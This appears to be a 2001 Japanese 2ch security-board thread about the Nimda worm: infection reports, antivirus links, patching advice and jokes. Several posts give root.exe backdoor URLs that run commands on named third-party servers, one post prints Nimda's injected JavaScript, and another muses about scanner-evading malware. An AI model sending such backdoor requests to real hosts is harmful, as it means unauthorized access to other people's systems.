Date : Mon, 24 Sep 2001 12:58:00 -0400
Received: from [203.228.117.254] by hotmail.com (3.2) with ESMTP id MHotMail***
From ittinfo100@excite.com Mon, 24 Sep 2001 09:57:49 -0700
X-Sender: ittinfo100@excite.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
X-Priority: 3
X-MSMail-Priority: Normal
ittremove@excite.com

From : Luigi@getfreepizza.com
Subject : FREE Pizza Hut pizza for a year !!
Date : Fri, 21 Sep 2001 17:54:25 -0600
MIME-Version: 1.0
Received: from [139.142.205.227] by hotmail.com (3.2) with ESMTP id MHotMail***
Received: from playsic-en4q0ov (localhost) by mail2.playsic.com (LSMTP for Windows NT v1.1b) with SMTP id <11.0000002F@mail2.playsic.com>; Fri, 21 Sep 2001 18:01:56 -0600
From owner-nolist-testbounce Sat, 22 Sep 2001 00:38:14 -0700

From : PUNTOG.NET < correono@puntog.net >
Subject : World Trade Center + 400 fotos, videos, etc. --> Noticias PUNTOG.NET - 22.09.2001 - SOMOS de 15.000.-
Date : Mon, 24 Sep 2001 21:10:00 +0200
MIME-Version: 1.0
Received: from [195.53.204.158] by hotmail.com (3.2) with ESMTP id MHotMail***
Received: from localhost ([217.126.109.143]) by infonegocio.com with Microsoft SMTPSVC(5.5.1877.507.50); Mon, 24 Sep 2001 00:17:32 +0200
From correono@puntog.net Sun, 23 Sep 2001 15:21:55 -0700
X-Sender: correono@puntog.net
Organization: www.puntog.net
Return-Path: correono@puntog.net
Message-ID: < 06d2e3217221791SMTPOP140@infonegocio.com >

452 :名無しさん@お腹いっぱい。:01/09/25 04:34
>>449
>2)Javaのアクティブスクリプトを切る
頼むからこういう訳の解からん事は書かんでクレ…

453 : :01/09/25 04:58
>>452
ちがってた?javaスクリプト関係無し?

454 :名無しさん@お腹いっぱい。:01/09/25 05:04
>>452
JAVAアプレットと区別するため
アクティブスクリプトと表示されているが?

455 :452:01/09/25 05:15
>>453-454
Java"の"アクティブスクリプトなんてのは無い。
Javaアプレットのスクリプト/アクティブスクリプト(Javaスクリプト含)なら有るが。

456 :名無しさん@お腹いっぱい。:01/09/25 05:25
ついでに今回のにはJavaは関係無い。

457 : :01/09/25 05:34
なるほど。
Javaスクリプトのopenwindow()を実行されないようには
できないんでしょうか?

458 :名無しさん@お腹いっぱい。:01/09/25 05:35
「Javaスクリプト」じゃなくて「JavaScript」だ。

459 :名無しさん@お腹いっぱい。:01/09/25 06:17
>>444
>ウチの会社、偉い人が
> 「HPを見るだけで感染することなど有り得ない」
> と断言しちゃったんで、事実上対策禁止状態・・・。


会社サイトで堂々とニムダ垂れ流してるのはこういうところか・・。

たしかにニムダ、しなやかにニムダ、先進のネットワーク企業
http://www.d-link.co.jp/
ニムダダウンロードサービス実施中

弊社は「HPを見るだけで感染することなど有り得ない」と信じて三連休も思いっきり休んじゃいました。


460 : :01/09/25 07:00
>>446
>IE経由で感染したwin9X系のPCもIIS攻撃するんでしょうか?

>>448
>しない。W2KでIIS入ってればするけど。

すまん。これの情報源がどこにあるのか教えて。
下のページじゃ Nimda が IIS のバックドア探すために
get request を送るタイミングについては触れられてないんだけど・・・
http://a500.g.akamai.net/7/1776/484/00002/inet.trendmicro.co.jp/solutionfile/3059NIMDAINF.htm

461 :名無しさん@お腹いっぱい。:01/09/25 07:12
>>451

http://139.142.205.227/scripts/root.exe?/c%20dir%20c:\

こういうのって対策済み??

462 :名無しさん@お腹いっぱい。:01/09/25 07:51
>>449
前スレ900の対策はどうよ?
http://ton.2ch.net/test/read.cgi/sec/1000973617/900

463 :d-link.co.jp:01/09/25 09:51
Nimda感染サイトのwww.d-link.co.jpの上位回線はxdsl.ne.jpだから東京めたりっく通信だな。

東京めたりっく通信
http://www.metallic.co.jp/
新種ワーム「Nimda」感染に関するご注意
http://www.metallic.co.jp/topics/2001/0919.html

464 :名無しさん@お腹いっぱい。:01/09/25 10:03
>>463

>Nimda感染サイトのwww.d-link.co.jpの上位回線はxdsl.ne.jpだから東京めたりっく通信だな。


あ( ̄△ ̄;

トップページのhtmlファイルだけ削除だよ。
バックドアよりすごくない?(^^;

www.d-link.co.jp

465 :名無しさん@お腹いっぱい。:01/09/25 10:06
>>464 IIS可動させたまま駆除ソフト動かして、駆除ソフトにhtmlを含む感染ファイルを全部削除されちゃったのかな?

466 :名無しさん@お腹いっぱい。:01/09/25 10:16
http://www.takara-univ.ac.jp/scripts/root.exe?/c%20dir%20c:\
まだ相変わらず見えてるよ...
厨房の俺でもハッカーになれてしまう
W2k鯖は糞だね...

467 :名無しさん@お腹いっぱい。:01/09/25 10:38
>>466

チェック速いですね(^^;

相変わらずというより、ここ、昨夜夜半閉じていました。
昨夜とファイル構成が変わっているので一応駆除かなにかしたみたいです。

おそらくニムダ対策はしたみたいなんだけど、バックドアはそのままのようで・・。

あと、ここはw2kじゃないみたいです。
http://www.takara-univ.ac.jp/scripts/root.exe?/c%20ver

468 :名無しさん@お腹いっぱい。:01/09/25 11:20
CodeRed系のアタックも激減!
Nimda様ありがとう!

469 :名無しさん@お腹いっぱい。:01/09/25 11:34
>>466
ucspi-tcp-0.88.tar.gz
・・・何で、tarボール有るの?
ってーか、デュアルにしてlinuxに移行するつもりかな、取り合えず(w
コレでフィルタかけれるのかな。。。NT

470 :名無しさん@お腹いっぱい。:01/09/25 11:39
mentai鯖感染されてない?
mentai みてたらreadダウンロードダイアログが出たんだけど。
関係ない?ちなみに情報シス板見てた時。
勘違いだったらすまん

471 :名無しさん@お腹いっぱい。:01/09/25 11:42
>>407
あせるよね。
俺もホットゾヌのログで引っかかったので。

472 :名無しさん@お腹いっぱい。:01/09/25 11:46
>>471
mentai見てた時?

473 :名無しさん@お腹いっぱい。:01/09/25 11:46
>>470

とりあえず平気だけど・・。

http://mentai.2ch.net/test/read.cgi?bbs=infosys&key=1001349144&ls=100

あなた自身が感染していて、キャッシュにニムダJavaScriptがカキコされてるとか・・。

もしかして2ch専用ブラウザのどれかとか使ってませんか?

474 :名無しさん@お腹いっぱい。:01/09/25 11:48
>>469

この様子ではニムダごとlinuxに展開されることになると思われ。

475 :名無しさん@お腹いっぱい。:01/09/25 11:50
>もしかして2ch専用ブラウザのどれかとか使ってませんか?

いや、普通のIE5.5 SP2
騒がれてしばらくしてからSP当てた。

ちなみにSP当ててからIMEが遅くなり .htm(tar圧縮)も見れなくなった。
気にしてなかったけど、もしかして漏れ感染されてるのかな?w 笑いどころじゃないか・・・・・

476 :名無しさん@お腹いっぱい。:01/09/25 11:51
感染してるか否かを調べるにはどうすれば?

477 :名無しさん@お腹いっぱい。:01/09/25 11:59
>>476
とりあえずこれか?

トレンドマイクロ ・ ウイルス バスター オン ライン スキャン
http://www.trendmicro.co.jp/hcall/scan.htm

478 :名無しさん@お腹いっぱい。:01/09/25 12:02
>>434
>>>429
>
> 明日の朝、日本のニムダ報告件数が一気にふえるぞ。
>
> http://wtc.trendmicro.com/wtc/

増えてるよ(´Д`)

479 :名無しさん@お腹いっぱい。:01/09/25 12:14
>>477
ありがと。ただ今チェック中。
いや、感染してた・・・・・・・・・・
とりあえず本当にありがとう。

480 :名無しさん@お腹いっぱい。:01/09/25 12:16
read.exeダウンロードしてないのに・・・・・

ちなみにこれ
http://inet.trendmicro.co.jp/virusinfo/isp/default3.asp?VName=JS_NIMDA.A

481 :www.soai.ac.jp:01/09/25 12:40
あれ・・

482 :名無しさん@お腹いっぱい。:01/09/25 12:41
>>480
それだけなら、感染してないんじゃない?

483 :名無しさん@お腹いっぱい。:01/09/25 12:43
>>481
女子短大の学生さんがにちゃんなんかみてちゃダメだよ(w

484 :名無しさん@お腹いっぱい。:01/09/25 12:47
>>482
どうやら感染はしてないみたい。
プルトニウムの解説ページのキャッシュがウイルスチェックに引っかかったみたい。
いった記憶無いなあ・・・・・・2chでリンク張られてたのだろうか?

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

でも、なんでmentaiからread.exeダウンロードダイアログが出たんだろ?
とりあえずお騒がせいたしました。ありがとうございました。

485 :名無しさん@お腹いっぱい。:01/09/25 12:49
>>481
セキュ板に春の予感・・・

486 :名無しさん@お腹いっぱい。:01/09/25 12:52
>>483
業者の人間が、学校へ行って接続しただけじゃ!(w

>>478
http://wtc.trendmicro.com/wtc/
すげぇ〜韓国、中国、ロシアでは一件の報告例もないぞ!(w

487 :名無しさん@お腹いっぱい。:01/09/25 12:55
>>486

> >>478
> http://wtc.trendmicro.com/wtc/
> すげぇ〜韓国、中国、ロシアでは一件の報告例もないぞ!(w

ワレ大国では、バスター持っててもキーが送られてこないから、ニムダのひっかかるバージョンがまだないのよ(w

488 :N374:01/09/25 13:17
>>486
ぢつは、、、、韓国、中国、ロシア共同で今回のnimdaコンセプトウイルス開発
してたのさ。
だから、事前情報持っててパッチは適用済み。
俺の脳みそカーニボーがキャッチした情報だ。

489 :迷子の子猫:01/09/25 13:27
>もしかして2ch専用ブラウザのどれかとか使ってませんか?

2ch専用ブラウザってIEの部品使ってるんですよね。
IE5.5 SP2だったら大丈夫ですよね?
私かちゅ使用なんですけど・・・

490 :名無しさん@お腹いっぱい。:01/09/25 13:32
http://wtc.trendmicro.com/wtc/
グラフのニムダ収束の仕方が気になる。
いくら何でも発生以前の状態にこんなに早くなる物か?

491 :<`∀´>ニムダ!! :01/09/25 13:44
SouthKorea---0
うそーん

492 :名無しさん@お腹いっぱい。:01/09/25 13:48
>>490
Daily Summary Report のグラフのことを言っているのだろうが、最終日
の値は、0に固定されているから収束しているように見えるが、実際の値
は9/23日の値を最後としてグラフをみるべし。

一応、数量的には収束に向かっていると評価してもよいだろうが、発生前
の水準に戻ったなんてことはないね。

493 :名無しさん@お腹いっぱい。:01/09/25 13:54
>>489

ええっと、ログの保存形式の関係で、キャッシュなどがあるスキャンソフトではひっかかり、あるものでは引っかからないと、ここの過去ログで読んだ気がしたので書いてみましたm(_ _)m

494 :名無しさん@お腹いっぱい。:01/09/25 13:59
>>492
>最終日の値は、0に固定されているから収束しているように見えるが
そうだったんだ。変だとオモッタヨ。

リンク間違ってた。グラフはこっち。
http://wtc.trendmicro.com/wtc/report.html

495 :名無しさん@お腹いっぱい。:01/09/25 13:59
>>488

>ぢつは、、、、韓国、中国、ロシア共同で今回のnimdaコンセプトウイルス開発
してたのさ。
>だから、事前情報持っててパッチは適用済み。


そんなこたぁない(w

「中国一号」,100万人に感染か──人民日報
http://www.zdnet.co.jp/news/bursts/0109/21/people.html

496 :名無しさん@お腹いっぱい。:01/09/25 14:04
全然収束してないよ。
CodeRedの方がひどいね。
Nimdaを駆除したからって安心してる人も多い。

497 :名無しさん@お腹いっぱい。:01/09/25 14:05
ここきのうまでニムダサイトだったんだけど、対応ひどくない?

http://www.d-link.co.jp/

498 :名無しさん@お腹いっぱい。:01/09/25 14:13
>>497
ここはおとといまでニムダサイトだったんだけど、しらんぷり。ひどくない?

http://www.with9.com/

499 :名無しさん@お腹いっぱい。:01/09/25 14:15
>>496
ひどいねぇ・・・・。
http://210.12.157.160/scripts/root.exe?/c%20dir%20c:\

500 :12ch:01/09/25 14:18
新種のコンピューターウイルス「W32.Vote.A@mm」が登場し、ウイルス対

501 :迷子の子猫:01/09/25 14:22
>>493
レスありがとうございます。
だけど意味がわからない私って・・・(ニガワラ

いろんなスレを読んでみて、大丈夫だとは思っていたんですが
>>473さんの

>あなた自身が感染していて、キャッシュにニムダJavaScriptがカキコされてるとか・・。
>もしかして2ch専用ブラウザのどれかとか使ってませんか?

発言を読んで専用ブラウザは感染の恐れがあるってこと?
と思ったもので。ここ、セキュ板だし・・・。

502 :名無しさん@お腹いっぱい。:01/09/25 14:26
>>500
>新種のコンピューターウイルス「W32.Vote.A@mm」が登場し、ウイルス対


これが何か?
ウイルス名: TROJ_VOTE.A
http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=TROJ%5FVOTE%2EA

ニムダ対応パターンで検知可能だそうな。

ちがってたらフォローくれ。

503 :>:01/09/25 14:55
連休明けても、放置されたままサイト結構あるな。。
たち上げ時に業者に設定させて
あとは日常は管理してないのかな

504 :名無しさん@お腹いっぱい。:01/09/25 14:57
>>502

って、今日になってのーとん先生、アップデート出してるやん(@@〜☆

505 :名無しさん@お腹いっぱい。:01/09/25 15:48
>>504

ういるすばすたーもでてるやん(@@〜☆

摩訶ふぃーはどうよ?

506 :名無しさん@お腹いっぱい。:01/09/25 16:07

表紙が無くなっていると思ったのに、またこんな・・。
http://www.maruko-j.co.jp/scripts/root.exe?/c%20dir%20c:\

507 :名無しさん@お腹いっぱい。:01/09/25 16:20
WinNT3.51serverで対応できた人いますか?
共有かけてあったホルダにdesktop.emlが出来てたけどそれ以外は
被害は無い様なんですけど。

508 :名無しさん:01/09/25 16:22
トホホ…

http://www.maruko-j.co.jp/WebBBS/info.html

(注: readme.emlはありません)

509 :名無しさん:01/09/25 16:33
誰だmaruko-j.co.jpのサイトのファイル全部消したの(w

510 :>:01/09/25 16:37
>>505
まかちゃんも対応済み
http://www.nai.com/japan/virusinfo/virV.asp?v=W32/Vote@MM

511 :-:01/09/25 16:45
ちんぴょろすぽーん!
http://members.tripod.co.jp/bingo852/

512 :名無しさん@お腹いっぱい。:01/09/25 16:50
読売新聞に「ニムダ感染拡大」の記事が
http://www.yomiuri.co.jp/bitbybit/bbb07/192501.htm

513 :名無しさん@お腹いっぱい。:01/09/25 17:15
あげ

514 :名無しさん@お腹いっぱい。:01/09/25 18:29
>>509

まあ、ここは旧に復してもどうせすぐroot.exeが挿入されるだろう(w

515 :名無しさん@お腹いっぱい。:01/09/25 18:47
>>512
ソコの記事読んで思った。今回慌ててSP当てた人が大半だと思うけど、個別のパッチ当ててく
方が更に重要だと思う。今後的に。
そりゃ、SP自体週1で更新されてれば良いけど(w

516 :名無しさん@お腹いっぱい。:01/09/25 18:55
| 日本ネットワークセキュリティ協会理事でもある日本ヒューレット・パッカードの
| 佐藤慶浩シニアセキュリティコンサルタントは、「例えば一般ユーザー向けに
| ボタン1つで簡単、迅速にソフトを最新版に更新できる機能をIEにつけるべきだ」
| と指摘する。ユーザー自身がパソコンを守るという意識を高める必要があるが、
| マイクロソフトにも、確実に伝わる分かりやすい情報提供が求められよう。

うーん、これってWindowsUpdateではないのだろうか…
日本ネットワークセキュリティ協会理事はWindowsUpdateを知らないのだろうか、
それともWindowsUpdateではまずいなら、それ欠点もちゃんと説明すべきではないだろうか…

WindowsUpdateは怖い、SPを当てると動かなくなることがあるからいやだ、
HotFixは面倒…

あーもうこういう自分勝手な輩にはいいかげんうんざりだよ。

517 :名無しさん@お腹いっぱい。:01/09/25 19:05
>>512
>読売新聞に「ニムダ感染拡大」の記事が
> http://www.yomiuri.co.jp/bitbybit/bbb07/192501.htm

◆セキュリティーに無関心な利用者


どちらかというと今回の場合、利用者というより管理者のような・・。

518 :名無しさん@お腹いっぱい。:01/09/25 19:06
>>516
たぶん、キーボードに「WindowsUpdateキー」をつけたらイイ!
とか思ってるんでない?
F1キーに「ヘルプ」とか、キーの機能を表すテプラを貼ってる人もいるくらいだしね。

519 :名無しさん@お腹いっぱい。:01/09/25 19:08
>>516
>ユーザー自身がパソコンを守るという意識を高める必要があるが、
・・・ボタン一つでやらせて、コレ身につくの?(w
穴放置させとくよりは良いか。
あんまり、揚げ足鳥は良くないけど。。言いたくも成るよね。>516

520 :弊社では:01/09/25 19:14

ついに弊社では、「ウィルス被害を防止するため、インターネット・エクスプローラおよび Outlookの使用を平成14年3月末まで禁止する。」という通達が出ました。(><)

521 :名無しさん@お腹いっぱい。:01/09/25 19:16
>>512
肝心なバックドアからの感染には全く触れてないね…

522 :名無しさん@お腹いっぱい。:01/09/25 19:17
>>520
・・・・ネタでなく??
ご愁傷様・・・

523 :知り合いの会社は:01/09/25 19:17
WEB閲覧が全面的にストップされて、困っていました。

524 :名無しさん@お腹いっぱい。:01/09/25 19:18
>>518

きっとそのキーからすり減るね(^^;

どこかで見た Ctrl+Alt+Del だけのキーボード(w に通ずるものがある(^^;

これからはF5キー連打ではなくWindowsUpdateキー連打でMSにDDos攻撃だ!(w

525 :名無しさん@お腹いっぱい。:01/09/25 19:19
>523
現状調査と対策済むまでは、仕方ないね。

526 :名無しさん@お腹いっぱい。:01/09/25 19:22
なんて豪快な・・。

http://www.d-link.co.jp/

527 :名無しさん@お腹いっぱい。:01/09/25 19:24
>>520
ついでにWindowsもやめてMacかLinuxにでもするとよいねぇ。
もちろんWordやExcelのマクロも危険ですから一太郎とLotus1-2-3に決まりだね。

ったく、IEやOutlookを禁止する通達が出せるなら、なぜIEのSP2をあて、Outlook
にもSR2をあてる通達が出せないんだか。

きっと脳みそのbit数が足りないんだろうね。

528 :名無しさん@お腹いっぱい。:01/09/25 19:24
>>520
いろんな対応があるものだ。
こうなるとパソコンの使用禁止ってのもどっかにあるんだろうな。

529 :名無しさん@お腹いっぱい。:01/09/25 19:26
>>526

ソースみて二度びっくり(@@〜☆

530 :名無しさん@お腹いっぱい。:01/09/25 19:28
>>526
やけっぱちでワードでHTML作ったな。

531 :名無しさん@お腹いっぱい。:01/09/25 19:30
>>528

伝聞だが某大学の学生向けパソコンスペースは当面閉鎖になったらしい。就職活動はどうするんだ?

532 :名無しさん@お腹いっぱい。:01/09/25 19:31
PC-9801をDOSで使ってる人は引っかからなくてラッキーだったかも。
未だに一太郎4使ってるとこもあるし…

533 :名無しさん@お腹いっぱい。:01/09/25 19:32
>>530

しかし、ここは近日中に再感染するとみた・・・<先週以来の対応が泥縄

534 :名無しさん@お腹いっぱい。:01/09/25 19:36
ここの告知が変わったぞ。

http://www.with9.com


これの影響か?

http://www.dolphinnetservice.ne.jp/component/bbs/bbs.asp

535 :名無しさん@お腹いっぱい。:01/09/25 19:40
>>533
今月でCoderedIIは永眠するからその後フォーマットすればバックドアは塞がる。
「おおっ直ったじゃん」ってこんな対応でもいいのかな。
このサイト管理者。

536 :名無しさん@お腹いっぱい。:01/09/25 19:57
>>527

その通達出したらITが対応でてんてこまいになるからだろ
パッチ出る度に「やり方がわかりません」なんて言われてITがいちいち対応しなくちゃならん。
それなら、いっそうのこと使用禁止にした方がまだまし。

だいたいIE、OEでなくちゃならん理由はないだろ。

537 :名無しさん@お腹いっぱい。:01/09/25 19:58
>>528

そりゃないだろ

IEやOEの代わりはいくらでもあるがPCの代わりはない

538 :対策済:01/09/25 19:59
From : ittinfo100@excite.com
Subject : Re: Make Unlimited Phone Calls for $69.95/month! CODE:7777
Date : Mon, 24 Sep 2001 12:58:00 -0400 Received: from [203.228.117.254] by hotmail.com (3.2) with ESMTP id MHotMail***
From ittinfo100@excite.com Mon, 24 Sep 2001 09:57:49 -0700
X-Sender: ittinfo100@excite.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
X-Priority: 3
X-MSMail-Priority: Normal
ittremove@excite.com

From : Luigi@getfreepizza.com
Subject : FREE Pizza Hut pizza for a year !!
Date : Fri, 21 Sep 2001 17:54:25 -0600
MIME-Version: 1.0
Received: from [139.142.205.227] by hotmail.com (3.2) with ESMTP id MHotMail***
Received: from playsic-en4q0ov (localhost) by mail2.playsic.com (LSMTP for Windows NT v1.1b) with SMTP id <11.0000002F@mail2.playsic.com>; Fri, 21 Sep 2001 18:01:56 -0600
From owner-nolist-testbounce Sat, 22 Sep 2001 00:38:14 -0700

From : PUNTOG.NET < correono@puntog.net >
Subject : World Trade Center + 400 fotos, videos, etc. --> Noticias PUNTOG.NET - 22.09.2001 - SOMOS de 15.000.-
Date : Mon, 24 Sep 2001 21:10:00 +0200
MIME-Version: 1.0
Received: from [195.53.204.158] by hotmail.com (3.2) with ESMTP id MHotMail***
Received: from localhost ([217.126.109.143]) by infonegocio.com with Microsoft SMTPSVC(5.5.1877.507.50); Mon, 24 Sep 2001 00:17:32 +0200
From correono@puntog.net Sun, 23 Sep 2001 15:21:55 -0700
X-Sender: correono@puntog.net
Organization: www.puntog.net
Return-Path: correono@puntog.net
Message-ID: < 06d2e3217221791SMTPOP140@infonegocio.com >

539 :名無しさん@お腹いっぱい。:01/09/25 20:01
IE、OE使ってるヤツはウイルスをばらまいてることに責任を感じないんだろうか

540 :名無しさん@お腹いっぱい。:01/09/25 20:04
>>535
フォーマットしたら当然パッチも消えてる事に管理者気づく事を祈ろう(w

541 :W32.Vote.A@mm:01/09/25 20:05
>>502
スレ違いだが「アメリカとイスラムの戦争について調査してます。
投票してくださいね」みたいなメールと一緒にやってくるそうな。
それで「vote」らしい。

夕刊に載ってた。

542 : :01/09/25 20:07
>>539
モ、モ、漏れがいつばら撒いたって言うんだ!!!!
今俺はナー!真赤なかをしてぷるぷしながらきーぼど叩いてるんだぞ!!!!

543 :名無しさん@お腹いっぱい。:01/09/25 20:58
>>540

ありえんな。ニムダのまえにバックドア飼ってたんだから。

またおなじこと繰り返しておしまい。

544 :名無しさん@お腹いっぱい。:01/09/25 20:59
>>539

感じたら元から使わないし、PC買う前にマカになっちまうよ(w

545 :名無しさん@お腹いっぱい。:01/09/25 21:05
>>541

まあ、このテは日本でははやらんな。

546 :名無しさん@お腹いっぱい。:01/09/25 21:18
>>541
>>>502

> それで「vote」らしい。
>
> 夕刊に載ってた。

これかな。
http://www.asahi.com/international/update/0925/014.html
米で「投票ウイルス」発見 軍事行動の是非問う形で侵入

ここだけやけに重いんだが。
話題性があるからだろうけど、ちょっと扱いが大げさな気もする。

547 :名無しさん@お腹いっぱい。:01/09/25 21:22
>>539 Win使うにゃぁそのくらいの鈍さがないとやってられん。そのていどで自分責めてたら発狂しちまう。

548 :名無しさん@お腹いっぱい。:01/09/25 21:32
なんだここ?

宝塚造形芸術大学 短期大学部 見えたり閉めたり晒したり
http://www.takara-univ.ac.jp/

ここ4日くらい、昼間は感染サイト、夜は不通。

まさかWebサーバを朝起動して夜落してるのか?(w

549 :名無しさん@お腹いっぱい。:01/09/25 21:43
元感染サイト

株式会社シーエスディー
http://www.powerstage.com/default1.asp

ニムダ配布してニダの国行きプレゼントかい(^^;

ニダウイルス
     ∧∧
    <`∀´>
     ≡
  /\≡/\
     │

550 :1:01/09/25 21:44
その画像ならココ
http://www.f2.dion.ne.jp/~impact14/

551 :名無しさん@お腹いっぱい。:01/09/25 21:49
>>550
ひまだねえ、あんた。

552 :名無しさん@お腹いっぱい。:01/09/25 22:03
再感染

日本スベック株式会社
http://61.113.0.130

東京中販事務局宛
http://www.ucar-tky.or.jp/mokuji.htm

553 :名無しさん@お腹いっぱい。:01/09/25 22:08
恥ずかしくないのかなぁ

554 :名無しさん@お腹いっぱい。:01/09/25 22:32
Apache使ってるものですが、ログに攻撃?の後が残されてるけど、
404とか400だから大丈夫って言う気はしてるんですが、
Sambaも使ってるんですね。それで、Sambaの共有フォルダに
ニムダ各種.emlが・・・。でも、LanにつながってるWindows
パソコン全てを検索・ウイルススキャンしたけど、感染してない
もよう。Sambaのニムダも全部消したけど、時間が経ったら
また現れた。これってやっぱしつながってるWindowsが感染してる
からですか?

555 :名無しさん@お腹いっぱい。:01/09/25 22:32
>552
ありがとう。
探してたんだ。

556 :名無しさん@お腹いっぱい。:01/09/25 22:43
感染

近畿文化体系策定協議会内 実行委員会  
http://www.bee.woodland.co.jp/test/kb-index.htm

再感染かも

557 :名無しさん@お腹いっぱい。:01/09/25 22:45
>>554
オレも同じだよ。
だからApacehのポート番号換えた。
んで、LANを繋ぎなおしてローカルIPも変えた。
ドライブが共有にされるから「TROJ」系のファイルもある筈だよ。

558 :名無しさん@お腹いっぱい。:01/09/25 22:50
>>554
まさか、NetBIOS系のポートが外から丸見え…ってことはないよね?

559 :554:01/09/25 22:51
>>557
レスどうもです。つまりWinじゃなくてApacheが
直接やられていると・・・?Apacheだから安心
なんて思っていてはいけないのかなぁ・・・・。

560 :名無しさん@お腹いっぱい。:01/09/25 22:54
>>554
ログを見ればApacheには外部から感染しないのはわかりそうな物だが・・・
Apacheにreadme.emlと改変されたhtmlファイルがあるのは共有でウプされた物。

561 :554:01/09/25 23:01
>>558
それはIPマスカレードなどに関わることでしょうか?
丸見えかどうかはどうやって判断すれば…。

>>560
外部からは感染しそうもないのは大体わかります。
emlファイルがあったのは、ApacheではなくSambaで
共有していたディレクトリでした。

サーバ立ててるくせに厨房っぷりを発揮してすい
ません…。まだやり始めたばかりでこれからという
ときにこんなことになってしまったので。

562 : :01/09/25 23:08
>>556
本当だ!!
バスター君、働いてくれた。

俺が見に行った時のアクセスカウンター 010325だけど・・・。

どれくらいまで増えるのかな?

563 :558:01/09/25 23:14
勢いで書いてしまったが、あんまり可能性なさそうだなあ。スマソ
CATVとかだったら有り得る…のかな?
ipchains なり iptables で、ポート番号137-139と445(TCP/UDP)あたりが
ブロックされていればOKでしょう。

564 :名無しさん@お腹いっぱい。:01/09/25 23:15
>>556
それテスト用のページみたい。
本編はこちら本編も感染。
ttp://www.bee.woodland.co.jp/
感染してるのに軽い。

565 :554:01/09/25 23:17
>>563=588
それは大丈夫です!

566 :名無しさん@お腹いっぱい。:01/09/25 23:32
>>554
こんな事聞くのもヤボだけど

どうやって感染の有無をチェックした?
W2kはFW通しているから安全とは思っていない?
W2kでこっそりIISが走っていない? インストールしたつもり無くても走ってる事あるよ。
CoderedUに感染した事ない?
このスレでリンクされてる感染サイト行ってない?

567 :名無しさん@お腹いっぱい。:01/09/25 23:34
JR東海がNimdaの攻撃を撃退したとか記事が産経にでてたが
わざわざ記事にするような話だろうか。

568 :名無しさん@お腹いっぱい。:01/09/25 23:36
>>554
Sambaの方も対策打つべし

「Samba における Nimda ワーム対策」
http://www.samba.gr.jp/project/kb/J0/1/09.html

569 : :01/09/25 23:41
やっぱ、自身を暗号化して潜り込んでウイルススキャンに引っかからない
ようなの作らないと駄目だな。

570 :554:01/09/25 23:44
>>566
Windowsは98とMeです。状況詳しく書いてなくてすいません。
>>568
ありがとうございます!早速見てみます。

571 :名無しさん@お腹いっぱい。:01/09/25 23:45
撃退つうのは自分のハードディスクからウィルスを除去するんでなくて
クソなアタックかけてくるPCをシャットダウンさせることだ。
ネットワークテロもそれを放置するやつも区別しない。

572 :無駄だよ:01/09/26 00:07
>>571
1,2日で簡易復旧されて即感染♪
元の木阿弥だよ(藁

573 :名無しさん@お腹いっぱい。:01/09/26 00:18
>>572
ちょんって頭悪いのかな?普通気付くだろ。

574 :名無しさん@お腹いっぱい。:01/09/26 00:19
>>554はIE(正確にはOE)の基本的対策も見ない消防か煽りと見ていいですか?>ALL

575 :名無しさん@お腹いっぱい。:01/09/26 00:19
LANで感染する方は、SP2とか適用してもどうにもならないの!?

576 :名無しさん@お腹いっぱい。:01/09/26 00:23
>>574
つか今更キャッシュのNimdaが検出されて騒いでるとかじゃない
ことを願う(w

577 :名無しさん@お腹いっぱい。:01/09/26 00:38
http://61.113.0.130/scripts/root.exe?/c%20dir%20c:\

悲しいね

578 :名無しさん@お腹いっぱい。:01/09/26 00:43
もう一度カキコしちゃお。

875 :追加 :01/09/23 00:28
ニムダは感染する環境の人には何度でも感染してくれる所が特徴だ。
それはユーザーの利用意識による所が大きい。
さらに一部は人間の脳に感染し脳をスポンジ化する。

579 :名無しさん@お腹いっぱい。:01/09/26 00:44
>>572

つーか、一ヶ月ぐらいシャットダウンされたのも気付かないかも(w

580 :名無しさん@お腹いっぱい。:01/09/26 00:46
>>554
ここまでの情報だと
1 SAMBAでファイル共有をしている。
2 WebサーバはApache
3 書いてないけど、サーバのOSはUNIX系
4 クライアント機はWindows98とMeが混在
5 クライアント機について、スキャンしたけどNIMDAの感染は発見できない
6 SAMBA共有ディレクトリ上に*.emlファイルが発見された
7 6のファイルを削除したが、また作られていた
ということかな

ほとんどクイズだけど、サーバ機にはWindowsNT/2000はないということ
でいいのかな?

サーバ機経由の再感染が考えられないのであれば、ファイル共有をして
いる範囲のクライアントのどれかが感染しているとしか考えられないね。

5のスキャン、検索をどのように実施したのかが問題のように思えるけど。

Samba上の*.emlファイルを削除して、次ぎに*.emlファイルが作られたら、
その間のSambaのログを追いかけるのも手だね。

噂では、Nimdaに感染したWinMe機から手動で関連ファイルを削除しても、
なぜか元に戻ってしまうケースもあるようだし。

581 :名無しさん@お腹いっぱい。:01/09/26 00:47
>>579

んで、あんだコケてたわ、とかいって再起動しておしまい。

駆除?するわけないっしょ。バックドアがあるのがその証。

582 :名無しさん@お腹いっぱい。:01/09/26 00:50
>>580
A1: SAMBA上の.emlは消したけど.nws,*.exe,riched20.dllは消してない

583 :名無しさん@お腹いっぱい。:01/09/26 00:51
>>580

おかしいと思ったんだよなぁ。鯖Apacheで、おそらくOSもUNIX系なのにやけにニムダ供給鯖になってるとこが多いなぁと・・。

Winユーザがアプした、ってだけのカンジじゃないんだよな、数的に。

いや、単なる疑惑なんだけど。

584 :名無しさん@お腹いっぱい。:01/09/26 00:51
サーバーの電源ランプが点灯しているのを確認するのがサーバー管理者の仕事ってか?(笑

585 :名無しさん@お腹いっぱい。:01/09/26 00:52
>>579

一ヶ月たったら、ニムダの存在自体忘れてるね

586 :名無しさん@お腹いっぱい。:01/09/26 00:53
>>584

実際作るだけ作ってもらって、いじると怒られる情けない管理者っていそう(^^;

587 :名無しさん@お腹いっぱい。:01/09/26 00:54
>>585 最初から最後までニムダなんて知らないで終わりかも。

588 :名無しさん@お腹いっぱい。:01/09/26 00:57
sageんでもよいわな。

>>583
感染ファイルの所有者を見ればわかると思われ。
クライアントからアップしたファイルならクライアントの
ユーザ所有になってるはず。

589 :名無しさん@お腹いっぱい。:01/09/26 01:03
>>583
クライアントで作成した時にhtmlだけスクリプト埋め込まれているのもありそう。
readme.emlがアップされてないので404エラーとなる。

590 :589:01/09/26 01:06
あっ、FTP時にフォルダー毎アップするとreadme.emlもアップされるから感染サイトになるね。

591 :名無しさん@お腹いっぱい。:01/09/26 01:07
>>589

